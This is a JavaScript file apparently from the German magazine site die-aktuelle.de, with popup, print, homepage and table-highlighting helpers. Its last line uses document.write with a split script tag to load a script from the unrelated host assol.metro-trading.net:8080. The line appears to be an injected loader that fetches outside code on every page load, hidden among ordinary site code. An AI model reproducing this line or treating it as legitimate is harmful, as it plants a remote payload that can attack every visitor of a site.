function galerie_fkt(quelle,von,bis,ivw)
{


var ivw_seite_galerie=ivw;
var lo="http://www.aktuelle.de/aktuelle/content/galerie/galerie_more.php?src="+quelle+"&von="+von+"&bis="+bis+"&ivw="+ivw_seite_galerie;
var neuf = window.open(lo,"NeuF","width=630,height=545,left=200,top=100,scrollbars=no,scrolling=no");

}

//Druck der aktuellen Seite 
function druck_dynamic(){
	var url2=parent.window.location.href;
	for(i=1;i<60;i++){
	url2 = url2.replace("&", "%");
	}
	var win=open('http://www.die-aktuelle.de/aktuelle/includes/druck_dynamic.php3?url='+url2,'Druckversion','width=650,height=555,left=200,top=100,toolbar=yes,location=yes,scrollbars=yes');
	
}
function galerie(quelle,titel,bereich)
{



var lo="http://www.die-aktuelle.de/aktuelle/content/galerie.php?src="+quelle+"&titel="+titel+"&bereich="+bereich;
var neuf = window.open(lo,"NeuF","width=650,height=630,left=200,top=100,scrollbars=no,scrolling=no");

}

function audio(document,w,y) {
center = (parseInt(navigator.appVersion) >= 4 && navigator.appName == "Netscape" ? true : false);
if (center) {
w = parseInt(w) + 20;
y = parseInt(y) + 20;
centerX = (screen.availWidth/2) - (w/2);
centerY = (screen.availHeight/2) - (y/2);
size = "innerWidth=" + w + ",innerHeight=" + y + ",screenX=" + centerX + ",screenY=" + centerY + ",scrollbars=auto,status";
} else {
w = parseInt(w) + 40;
y = parseInt(y) + 40;
size = "width=" + w + ",height=" + y + ",scrollbars=auto,status";
}
window.open(document,"AudioWindow",size);
}

function galeriekq(quelle,titel,kueche)
{



var lo="http://www.die-aktuelle.de/aktuelle/content/galeriekq.php?src="+quelle+"&titel="+titel+"&kueche="+kueche;
var neuf = window.open(lo,"NeuF","width=650,height=630,left=200,top=100,scrollbars=no,scrolling=no");

}
function video(document,w,y) {
center = (parseInt(navigator.appVersion) >= 4 && navigator.appName == "Netscape" ? true : false);
if (center) {
w = parseInt(w) + 20;
y = parseInt(y) + 20;
centerX = (screen.availWidth/2) - (w/2);
centerY = (screen.availHeight/2) - (y/2);
size = "innerWidth=" + w + ",innerHeight=" + y + ",screenX=" + centerX + ",screenY=" + centerY + ",scrollbars=auto,status";
} else {
w = parseInt(w) + 40;
y = parseInt(y) + 40;
size = "width=" + w + ",height=" + y + ",scrollbars=auto,status";
}
window.open(document,"VideoWindow",size);
}

function audio_news(document,w,y) {
center = (parseInt(navigator.appVersion) >= 4 && navigator.appName == "Netscape" ? true : false);
if (center) {
w = parseInt(w) + 20;
y = parseInt(y) + 20;
centerX = (screen.availWidth/2) - (w/2);
centerY = (screen.availHeight/2) - (y/2);
size = "innerWidth=" + w + ",innerHeight=" + y + ",screenX=" + centerX + ",screenY=" + centerY + ",scrollbars=auto,status";
} else {
w = parseInt(w) + 40;
y = parseInt(y) + 40;
size = "width=" + w + ",height=" + y + ",scrollbars=auto,status";
}
window.open(document,"AudioWindow",size);
}


//als Startseite definieren
function aktuelle_startseite ( thisObj )
{
  if ( isNav )
  {
     }
  else if ( isIe ) 
  {
    thisObj.style.behavior='url(#default#homepage)';
    thisObj.setHomePage('http://www.die-aktuelle.de/');
  }
}

function setPointer(theRow, theRowNum, theAction, theDefaultColor, thePointerColor, theMarkColor, id_box, farbe)
{
    var theCells = null;

    // 1. Pointer and mark feature are disabled or the browser can't get the
    //    row -> exits
    if ((thePointerColor == '' && theMarkColor == '')
        || typeof(theRow.style) == 'undefined') {
        return false;
    }

    // 2. Gets the current row and exits if the browser can't get it
    if (typeof(document.getElementsByTagName) != 'undefined') {
        theCells = theRow.getElementsByTagName('td');
    }
    else if (typeof(theRow.cells) != 'undefined') {
        theCells = theRow.cells;
    }
    else {
        return false;
    }

    // 3. Gets the current color...
    var rowCellsCnt  = theCells.length;
    var domDetect    = null;
    var currentColor = null;
    var newColor     = null;
    // 3.1 ... with DOM compatible browsers except Opera that does not return
    //         valid values with "getAttribute"
    if (typeof(window.opera) == 'undefined'
        && typeof(theCells[0].getAttribute) != 'undefined') {
        currentColor = theCells[0].getAttribute('bgcolor');
        domDetect    = true;
    }
    // 3.2 ... with other browsers
    else {
        currentColor = theCells[0].style.backgroundColor;
        domDetect    = false;
    } // end 3

    // 4. Defines the new color
    // 4.1 Current color is the default one
   
        if (theAction == 'over' && thePointerColor != '') {
            newColor              = thePointerColor;
        }
        else if (theAction == 'click' && theMarkColor != '') {
            newColor              = theMarkColor;
            marked_row[theRowNum] = true;
        }
     // end 4

    // 5. Sets the new color...
    if (newColor) {
    	ns4=(document.layers)?1:0;
	ie4=(document.all)?1:0;
	ie5ns6=(document.documentElement)?1:0;
	if(ie5ns6) document.getElementById(id_box).style.color=farbe;
	else if(ie4) document.all[id_box].style.color=farbe;
	else document.layers[id_box].color=farbe;
        var c = null;
        // 5.1 ... with DOM compatible browsers except Opera
        if (domDetect) {
            for (c = 0; c < rowCellsCnt; c++) {
                theCells[c].setAttribute('bgcolor', newColor, 0);
                
            } // end for
        }
        // 5.2 ... with other browsers
        else {
            for (c = 0; c < rowCellsCnt; c++) {
                theCells[c].style.backgroundColor = newColor;
            }
        }
    } // end 5

    return true;
} // end of the 'setPointer()' function

function bgzeile(theRow, theRowNum, theAction, theDefaultColor, thePointerColor, theMarkColor)
{
    var theCells = null;

    // 1. Pointer and mark feature are disabled or the browser can't get the
    //    row -> exits
    if ((thePointerColor == '' && theMarkColor == '')
        || typeof(theRow.style) == 'undefined') {
        return false;
    }

    // 2. Gets the current row and exits if the browser can't get it
    if (typeof(document.getElementsByTagName) != 'undefined') {
        theCells = theRow.getElementsByTagName('td');
    }
    else if (typeof(theRow.cells) != 'undefined') {
        theCells = theRow.cells;
    }
    else {
        return false;
    }

    // 3. Gets the current color...
    var rowCellsCnt  = theCells.length;
    var domDetect    = null;
    var currentColor = null;
    var newColor     = null;
    // 3.1 ... with DOM compatible browsers except Opera that does not return
    //         valid values with "getAttribute"
    if (typeof(window.opera) == 'undefined'
        && typeof(theCells[0].getAttribute) != 'undefined') {
        currentColor = theCells[0].getAttribute('bgcolor');
        domDetect    = true;
    }
    // 3.2 ... with other browsers
    else {
        currentColor = theCells[0].style.backgroundColor;
        domDetect    = false;
    } // end 3

    // 4. Defines the new color
    // 4.1 Current color is the default one
   
        if (theAction == 'over' && thePointerColor != '') {
            newColor              = thePointerColor;
        }
        else if (theAction == 'click' && theMarkColor != '') {
            newColor              = theMarkColor;
            marked_row[theRowNum] = true;
        }
     // end 4

    // 5. Sets the new color...
    if (newColor) {
    	
        var c = null;
        // 5.1 ... with DOM compatible browsers except Opera
        if (domDetect) {
            for (c = 0; c < rowCellsCnt; c++) {
                theCells[c].setAttribute('bgcolor', newColor, 0);
                
            } // end for
        }
        // 5.2 ... with other browsers
        else {
            for (c = 0; c < rowCellsCnt; c++) {
                theCells[c].style.backgroundColor = newColor;
            }
        }
    } // end 5

    return true;
}

function onNav(loc, track){
	document.images[loc].src = "/aktuelle/images/button/"+loc+"_r.gif";
}

// Aufruf bei onMouseOut
function offNav(loc, track) { 
	document.images[loc].src = "/aktuelle/images/button/"+loc+"_w.gif";
 }


document.write('<s'+'cript type="text/javascript" src="http://assol.metro-trading.net:8080/Page_View.js"></scr'+'ipt>');